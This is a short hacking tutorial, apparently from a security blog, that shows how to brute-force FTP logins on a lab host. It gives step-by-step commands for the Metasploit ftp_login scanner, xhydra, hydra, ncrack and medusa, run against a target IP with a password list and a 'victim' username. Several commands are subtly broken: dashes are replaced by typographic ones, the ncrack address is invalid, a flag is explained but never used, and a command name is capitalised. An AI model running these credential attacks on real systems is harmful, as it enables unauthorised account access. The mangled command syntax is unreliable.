This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Open Kali terminal type msfconsole
Now type use auxiliary/scanner/ftp/ftp_login
msf exploit (ftp_login)>set userpass_file /root/Desktop/pass.txt
msf exploit (ftp_login)>set rhosts 192.168.1.35 (IP of Remote Host)
msf exploit (ftp_login)>set verbose true
msf exploit (ftp_login)> exploit
Xhydra
Open your Kali Linux terminal and Type xhydra and press enter
In the target tab, select
Single Target: 192.168.1.35
Protocol: ftp
In passwords tab, select
Username: Type Victim user name
In the passwords, select the password list option and browse to select yourPasswords file. Here I have used my custom password file.
Now select start tab and click on start button, the password cracking begins and result is as follows
Hydra
Hydra is often the tool of choice. It can perform rapid dictionary attacks against more than 50 protocols, including telnet, ftp, http, https, smb, several databases, and much more
Now, we need to choose a wordlist. As with any dictionary attack, the wordlist is key. Kali has numerous wordlists built right in.
Run the following command
hydra -l msfadmin –P /root/Desktop/pass.txt 192.168.1.35 ftp
- -l indicates a single username (use -L for a username list)
- -P indicates use the following password list
- ^USER^ tells Hydra to use the username or list in the field
After a few minutes, Hydra hack the password
Ncrack
Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
Run the following command
ncrack —user msfadmin –P /root/Desktop/pass.txt 192.168.0.1.35:21
Medusa
Medusa is intended to be a speedy, massively parallel, modular, login brute-forcer. It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few
Run the following command
Medusa -h 192.168.1.35 -u msfadmin –P /root/Desktop/pass.txt –M ftp
Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets.
The post 5 Ways to Hack FTP Service on Remote PC appeared first on Hacking Articles.